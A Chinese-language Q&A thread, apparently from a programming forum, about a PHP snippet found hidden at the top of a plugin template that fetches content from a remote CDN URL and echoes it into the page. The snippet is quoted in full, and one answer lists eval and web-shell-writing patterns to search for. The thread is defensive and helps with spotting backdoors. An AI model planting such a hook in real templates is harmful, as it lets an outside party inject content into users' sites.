1

我刚刚发现这个嵌入在我正在使用的插件中(在 html 之前的 tmpl 文件的开头)......

我应该担心吗?我可以删除它吗?

<?php 
$author = @file_get_contents('http://d5827db8276672d15fca-1e2d3239e5a8580a4f85f7906852eb87.r51.cf1.rackcdn.com/author3c.php');
echo $author;
?>

谢谢

4

3 回答 3

2

我刚刚访问了那个 url,它只是一个空的 php 文件,所以除非在某个地方声明它必须保留,否则我会删除它。

编辑::

当我说它是一个空的 php 文件时,它实际上弹出了一个下载对话框来下载该文件,它不仅为我提供了一个空页面。

于 2012-11-20T11:55:13.333 回答
1

我删除它,如果您无法控制该文件中的内容,那么您将面临安全风险,无论模板的作者说什么。

检查你的代码的其余部分eval($author)file_put_contents('shell.php',$author);

于 2012-11-20T11:58:11.523 回答
0

file_get_contents只是将文件的所有内容加载到变量中而不执行代码

我建议您首先检查该文件中是否没有关键标签或代码,然后您可以安全地删除它。

有关更多信息,请参阅 PHP.net 上的此页面:file_get_contents 手册

于 2012-11-20T11:56:02.760 回答